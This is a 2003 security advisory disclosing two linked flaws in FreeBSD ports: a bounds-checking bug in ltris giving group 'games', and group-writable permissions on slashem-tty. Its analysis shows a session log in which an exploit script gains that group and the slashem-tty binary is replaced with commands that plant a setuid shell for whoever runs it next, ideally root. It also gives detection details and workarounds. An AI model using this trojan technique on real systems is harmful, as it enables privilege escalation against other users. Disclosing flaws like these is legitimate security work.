I. BACKGROUND

ltris is a tetris clone shipping with the freebsd ports system.
More info is available at http://lgames.sourceforge.net/#ltris
slashem-tty is a nethack derivative shipping with the freebsd ports
system. More info is available at http://slashem.sourceforge.net/.

II. DESCRIPTION

ltris: Insufficient bounds checking gives gid games.
slashem-tty: wrong file permissions allows alteration/code injection.
together: all sorts of suid shells from eager slashem-tty players.

III. ANALYSIS

slashem-tty is the real sinner in this case, since not much fun can be
had with gid games. The ltris is just a handy way to do this.

Example run:

--
-bash-2.05b$ perl DSR-ltris.pl 
Address: 0xbfbff825
LTris 1.0.1
Copyright 2002 Michael Speck
Published under GNU GPL
---
Looking up data in: /usr/local/share/ltris
id
uid=1000(kain) gid=1000(kain) egid=13(games) groups=13(games), 1000(kain), 0(wheel)
ls -la /usr/local/share/slashem-tty/slashem-tty
-rwxrwxr-x  1 games  games  1667192 Oct  5 12:19 /usr/local/share/slashem-tty/slashem-tty
cp /usr/local/share/slashem-tty/slashem-tty /usr/local/share/slashem-tty/slashem-tty.so
echo "cp /bin/sh /tmp/.$$ && chmod 4755 /tmp/.$$" > /usr/local/share/slashem-tty/slashem-tty
echo "/usr/local/share/slashem-tty/slashem-tty.so" >> /usr/local/share/slashem-tty/slashem-tty
--

Now sit back and wait for someone(root) to start slashem-tty, and have fun
with their privileges.

IV. DETECTION

ltris-1.0.1,1 shipping with freebsd ports as per 25/2-03 is vulnerable.
slashem-tty-0.0.6E.4F.8 shipping with freebsd ports as per 25/2-03 is vulnerable.

V. WORKAROUND

lousy: chmod -s `which ltris`
better: chmod -w `which slashem-tty`

VI. VENDOR FIX

unknown

VII. CVE INFORMATION

unknown

VIII. DISCLOSURE TIMELINE

unknown

IX. CREDIT

Knud Erik Højgaard/kokanin, dtors security research